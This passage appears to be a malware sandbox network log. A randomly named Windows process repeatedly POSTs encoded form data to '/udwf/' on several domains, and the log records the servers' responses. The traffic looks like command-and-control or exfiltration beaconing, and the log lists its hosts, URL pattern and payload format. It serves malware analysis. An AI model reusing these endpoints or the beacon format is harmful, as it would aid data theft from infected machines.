                                                                                                                            Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_IJ6FVAJhvltVWAuToP4oL4atM71fkzPY7QYrgWTQ/RoOG0ccJaLLTy6N9einZpywHDc0RBAe9H6fep8xyV5umg==><head><meta charset="utf-8"><title>otternaut.live&nbsp;-&nbsp;otternaut Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="otternaut.live is your first and best source for all of the information youre looking for. From gene


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                            25 | 192.168.2.10 | 49740 | 168.76.252.99 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                                                                            Nov 10, 2023 09:29:15.508759022 CET | 248 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.lxdedu.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.lxdedu.com
                                                                                                                            Referer: http://www.lxdedu.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 188
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Ascii: G0Yxd2Q=7NMHmPZn9IojTfPmXReLFiMOyFHsdGtCXrV5koyflsmimiHzyIYZxvyloaTzm25/oSw032ABEGHX812bUjf3tDfIpsTMF4siQZOhg9pOMvmEeHY+cqA1xkH41uqbpwj2Wd6Ksia7AYkjMZEpzPk7d69gsfABt3gbPuoGk3ULmkFtbojvZA==
                                                                                                                            Nov 10, 2023 09:29:15.864568949 CET | 248 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Content-Type: text/html
                                                                                                                            Server: Microsoft-IIS/8.5
                                                                                                                            Date: Fri, 10 Nov 2023 08:29:13 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 596
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>404 - </title></head><body><script type="text/javascript">var L=window.location,D=document,a=L.pathname,b="",c="/",d="length";a=a.split(c);for(var i=1;i<a[d]-2;i++){b+=c+a[i];}b+=c;D.write("Back to <a href=\""+b+"\">"+L.host+b+"</a> , waiting.....");setTimeout(function(){L.href=b;},"200");</script></body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                            26 | 192.168.2.10 | 49741 | 168.76.252.99 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                                                                            Nov 10, 2023 09:29:18.389555931 CET | 249 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.lxdedu.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.lxdedu.com
                                                                                                                            Referer: http://www.lxdedu.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 208
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Ascii: G0Yxd2Q=7NMHmPZn9IojS/fmRAeLSSMN9lHsEWtGXrp5ktSPlfSimD3zxKwZ2vyli6T6rW54oS883zgBEGDX81mbU0L0izfOiMTKYosiQZOhg99oMv+Ee2o+dLA2v0H7yuqbiQjyWd64sj3gAasjMY0pzdc8TK9mm/BwknFJXsZ+lH814xR9e9P8e6DdCXuIsxt25VZnf6pttmM=
                                                                                                                            Nov 10, 2023 09:29:18.746262074 CET | 250 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Content-Type: text/html
                                                                                                                            Server: Microsoft-IIS/8.5
                                                                                                                            Date: Fri, 10 Nov 2023 08:29:16 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 596
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>404 - </title></head><body><script type="text/javascript">var L=window.location,D=document,a=L.pathname,b="",c="/",d="length";a=a.split(c);for(var i=1;i<a[d]-2;i++){b+=c+a[i];}b+=c;D.write("Back to <a href=\""+b+"\">"+L.host+b+"</a> , waiting.....");setTimeout(function(){L.href=b;},"200");</script></body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                            27 | 192.168.2.10 | 49742 | 168.76.252.99 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                                                                            Nov 10, 2023 09:29:21.261713982 CET | 252 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.lxdedu.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.lxdedu.com
                                                                                                                            Referer: http://www.lxdedu.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 1220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Ascii: G0Yxd2Q=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
                                                                                                                            Nov 10, 2023 09:29:21.615573883 CET | 253 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Content-Type: text/html
                                                                                                                            Server: Microsoft-IIS/8.5
                                                                                                                            Date: Fri, 10 Nov 2023 08:29:19 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 596
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>404 - </title></head><body><script type="text/javascript">var L=window.location,D=document,a=L.pathname,b="",c="/",d="length";a=a.split(c);for(var i=1;i<a[d]-2;i++){b+=c+a[i];}b+=c;D.write("Back to <a href=\""+b+"\">"+L.host+b+"</a> , waiting.....");setTimeout(function(){L.href=b;},"200");</script></body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                            28 | 192.168.2.10 | 49743 | 168.76.252.99 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                                                                            Nov 10, 2023 09:29:24.141567945 CET | 254 | OUT | GET /udwf/?G0Yxd2Q=2Pknl6RP8eYVb4X6Jw71HBsX3EzDU15MYpkSqP6Wnui62FTd2NB7+fGHhL+jrHNDvCcs8SUxdlzs7m6tHUr/+njhj/XBKtkfTg==&vhQT=aV8PeNo0MvDl1 HTTP/1.1
                                                                                                                            Host: www.lxdedu.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Nov 10, 2023 09:29:24.497469902 CET | 255 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Content-Type: text/html
                                                                                                                            Server: Microsoft-IIS/8.5
                                                                                                                            Date: Fri, 10 Nov 2023 08:29:23 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 596
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>404 - </title></head><body><script type="text/javascript">var L=window.location,D=document,a=L.pathname,b="",c="/",d="length";a=a.split(c);for(var i=1;i<a[d]-2;i++){b+=c+a[i];}b+=c;D.write("Back to <a href=\""+b+"\">"+L.host+b+"</a> , waiting.....");setTimeout(function(){L.href=b;},"200");</script></body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                            29 | 192.168.2.10 | 49744 | 35.227.246.104 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                                                                            Nov 10, 2023 09:29:29.831724882 CET | 256 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.xn--4gq62f8w1alm9b.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.xn--4gq62f8w1alm9b.xyz
                                                                                                                            Referer: http://www.xn--4gq62f8w1alm9b.xyz/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 188
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Ascii: G0Yxd2Q=1QwlKK0QDEnhrvgFkJ4RUw/a03y/lKO4klUQhqfGAYMfdOUZZAlCqUdne7pj1sZqLcT0DzVOfmOPekhNaOEEN3i2bL2N5c1DuDBHtmFSQBmFam9djaIGLYRLGBqRf4zRP08EVsd9CmE/18G/RwTaLs3HxuSQREeKaG2qy34FHkVkhku1sA==
                                                                                                                            Nov 10, 2023 09:29:30.122710943 CET | 256 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                            Server: nginx/1.20.2
                                                                                                                            Date: Fri, 10 Nov 2023 08:29:29 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 157
                                                                                                                            Via: 1.1 google
                                                                                                                            Connection: close
                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                            3 | 192.168.2.10 | 49717 | 23.227.38.74 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                                                                            Nov 10, 2023 09:27:50.716406107 CET | 95 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.littlehappiez.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.littlehappiez.com
                                                                                                                            Referer: http://www.littlehappiez.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 1220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Nov 10, 2023 09:27:51.133230925 CET | 97 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Date: Fri, 10 Nov 2023 08:27:51 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            X-Sorting-Hat-PodId: 293
                                                                                                                            X-Sorting-Hat-ShopId: 83935199526
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-ShopId: 83935199526
                                                                                                                            X-ShardId: 293
                                                                                                                            Content-Language: en-US
                                                                                                                            Set-Cookie: localization=US; path=/; expires=Sun, 10 Nov 2024 08:27:50 GMT; SameSite=Lax
                                                                                                                            Set-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22USMA%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=littlehappiez.com; path=/; expires=Sat, 11 Nov 2023 08:27:51 GMT; SameSite=Lax
                                                                                                                            Set-Cookie: _shopify_y=8e7d96c0-29b1-4ebb-bc12-0695b29b2f51; Expires=Sat, 09-Nov-24 08:27:51 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                            Set-Cookie: _shopify_s=5a1d3429-a0f5-43f8-a851-d97cd1a79574; Expires=Fri, 10-Nov-23 08:57:51 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                            Server-Timing: processing;dur=155
                                                                                                                            X-Shopify-Stage: production
                                                                                                                            Content-Security-Policy: ; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=ed4b21a8-ae7c-4d8
                                                                                                                            Data Raw:
                                                                                                                            Data Ascii:
                                                                                                                            Nov 10, 2023 09:27:51.133271933 CET | 98 | IN
                                                                                                                            Data Ascii: -a742-54f3c4e662ceX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontrol
                                                                                                                            Nov 10, 2023 09:27:51.133285046 CET | 99 | IN
                                                                                                                            Nov 10, 2023 09:27:51.133299112 CET | 99 | IN
                                                                                                                            Nov 10, 2023 09:27:51.133311033 CET | 99 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 0


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                            30 | 192.168.2.10 | 49745 | 35.227.246.104 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                                                                            Nov 10, 2023 09:29:32.513824940 CET | 257 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.xn--4gq62f8w1alm9b.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.xn--4gq62f8w1alm9b.xyz
                                                                                                                            Referer: http://www.xn--4gq62f8w1alm9b.xyz/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 208
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Ascii: G0Yxd2Q=1QwlKK0QDEnhkuQFoKQRVQ/FoHy/z6O8klYQhrbWAqYfds8ZYBlC5kdnVbpqxsZhLcOJDxxOfmaPempNa8sDMnioQr2P9c1DuDBHtmR4QBuFbWtdi+cBUoRKQRqRMozVP082Vp5XCgI/1+O/QhTZBs3Bs+TCBHzSa2Gii3oLFEEBkxCmr96c9zQLKhNAJ6DPMuZFFrI=
                                                                                                                            Nov 10, 2023 09:29:32.805963993 CET | 258 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                            Server: nginx/1.20.2
                                                                                                                            Date: Fri, 10 Nov 2023 08:29:32 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 157
                                                                                                                            Via: 1.1 google
                                                                                                                            Connection: close
                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
31 | 192.168.2.10 | 49746 | 35.227.246.104 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
Timestamp | kBytes transferred | Direction | Data
Nov 10, 2023 09:29:35.185496092 CET | 260 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.xn--4gq62f8w1alm9b.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.xn--4gq62f8w1alm9b.xyz
                                                                                                                            Referer: http://www.xn--4gq62f8w1alm9b.xyz/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 1220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Nov 10, 2023 09:29:35.478204966 CET | 261 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                            Server: nginx/1.20.2
                                                                                                                            Date: Fri, 10 Nov 2023 08:29:35 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 157
                                                                                                                            Via: 1.1 google
                                                                                                                            Connection: close
                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
32 | 192.168.2.10 | 49747 | 35.227.246.104 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
Timestamp | kBytes transferred | Direction | Data
Nov 10, 2023 09:29:37.858119965 CET | 261 | OUT | GET /udwf/?G0Yxd2Q=4SYFJ+EdcnLhstYHjaYhZ0Xyh2Kg3P6YikQFgY7zApk8SZ1uWGpR3AVqWe4c3udQDum1CidNNnqrfkhOX4sOdDO6VZG27ug9uQ==&vhQT=aV8PeNo0MvDl1 HTTP/1.1
                                                                                                                            Host: www.xn--4gq62f8w1alm9b.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Nov 10, 2023 09:29:38.157619953 CET | 263 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.20.2
                                                                                                                            Date: Fri, 10 Nov 2023 08:29:37 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 5208
                                                                                                                            Last-Modified: Wed, 11 Oct 2023 10:00:52 GMT
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            ETag: "65267254-1458"
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Via: 1.1 google
                                                                                                                            Connection: close
                                                                                                                            Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js" crossorigin="true"></script><script>window.wpkReporter&&(window.wpk=new window.wpkReporter({bid:"berg-download",rel:"2.42.0",sampleRate:1,plugins:[[window.wpkglobalerrorPlugin,{jsErr:!0,jsErrSampleRate:1,resErr:!0,resErrSampleRate:1}],[window.wpkperformancePlugin,{enable:!0,sampleRate:.5}]]}),window.wpk.install())</script><script>function loadBaiduHmt(t){console.log("",t);var e=document.createElement("script");e.src="https://hm.baidu.com/hm.js?"+t;var o=document.getElementsByTagName("script")[0];o.parentNode.insertBefore(e,o)}function
Nov 10, 2023 09:29:38.157659054 CET | 264 | IN
                                                                                                                            Data Ascii: baiduPush(t,e,o){window._hmt.push(["_trackEvent",t,e,o])}console.log("..."),window._hmt=window._hmt||[];const BUILD_ENV="quark",token="42296466acbd6a1e84224ab1433a06cc";loadBaiduHmt(token)</script><script>function send
Nov 10, 2023 09:29:38.157677889 CET | 265 | IN
                                                                                                                            Data Ascii: (i)&&t.push("".concat(encodeURIComponent(i),"=").concat(encodeURIComponent(a[i])));var c=t.join("&").replace(/%20/g,"+"),s="".concat("https://track.uc.cn/collect","?").concat(c,"&").concat("uc_param_str=dsfrpfvedncpssntnwbipreimeutsv");(e()||r
Nov 10, 2023 09:29:38.157699108 CET | 266 | IN
                                                                                                                            Data Ascii: ument.getElementsByTagName("head")[0],$script1=document.createElement("script");$script1.setAttribute("crossorigin","anonymous"),$script1.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js"),$head.insertBefore($sc
Nov 10, 2023 09:29:38.165056944 CET | 267 | IN
                                                                                                                            Data Ascii: head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/js/vconsle.js"),$head.insertBefore(e,$head.lastChild)};bre
Nov 10, 2023 09:29:38.165117025 CET | 267 | IN
                                                                                                                            Data Ascii: ript src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.369a663b08a55d305b97.js"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
33 | 192.168.2.10 | 49748 | 91.195.240.19 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
Timestamp | kBytes transferred | Direction | Data
Nov 10, 2023 09:29:44.246426105 CET | 269 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.autokit.help
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.autokit.help
                                                                                                                            Referer: http://www.autokit.help/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 188
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Ascii: G0Yxd2Q=EjrafEIUNu0N9SPcTb60jAZFXmEXmouhZE4LjHjb/xnikCwcGPcnGXd4FXQ6mpjaQwJFQOs8ZH3QsnCSJiFhREroHBvuq7oGgaTjfUGH6Gt/AP3QGm7YbTD7rF+ovFPhFJuMh+o6KvqLEaoNVwNdI5oQ2YN0BDlK6icJqIyDmDR4PUImaQ==
Nov 10, 2023 09:29:44.553551912 CET | 269 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                            date: Fri, 10 Nov 2023 08:29:44 GMT
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 154
                                                                                                                            server: NginX
                                                                                                                            connection: close
                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
34 | 192.168.2.10 | 49749 | 91.195.240.19 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
Timestamp | kBytes transferred | Direction | Data
Nov 10, 2023 09:29:47.082045078 CET | 270 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.autokit.help
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.autokit.help
                                                                                                                            Referer: http://www.autokit.help/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 208
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Ascii: G0Yxd2Q=EjrafEIUNu0N8xHcR8O0yQZKL2EX94ulZE0LjG3L/H3ijm4cHOcnK3d4CnRw75jTQwVnQMo8ZHjQsmySJR9gTUruBBvg3LoGgaTjfUCt6Fd/A+HQGDPbFjD091+o41PlFJvjh/EAKquLEfMNRxNcB5ospIMCBhMe6wt1rZew02M0OBk1duNWefwSPFRRTPKCwPhGxYE=
Nov 10, 2023 09:29:47.396713018 CET | 270 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                            date: Fri, 10 Nov 2023 08:29:47 GMT
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 154
                                                                                                                            server: NginX
                                                                                                                            connection: close
Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
35 | 192.168.2.10 | 49750 | 91.195.240.19 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
Timestamp | kBytes transferred | Direction | Data
Nov 10, 2023 09:29:49.918850899 CET | 272 | OUT | POST /udwf/ HTTP/1.1
Host: www.autokit.help
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Origin: http://www.autokit.help
Referer: http://www.autokit.help/udwf/
Content-Type: application/x-www-form-urlencoded
Content-Length: 1220
Connection: close
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Nov 10, 2023 09:29:50.226386070 CET | 273 | IN | HTTP/1.1 405 Not Allowed
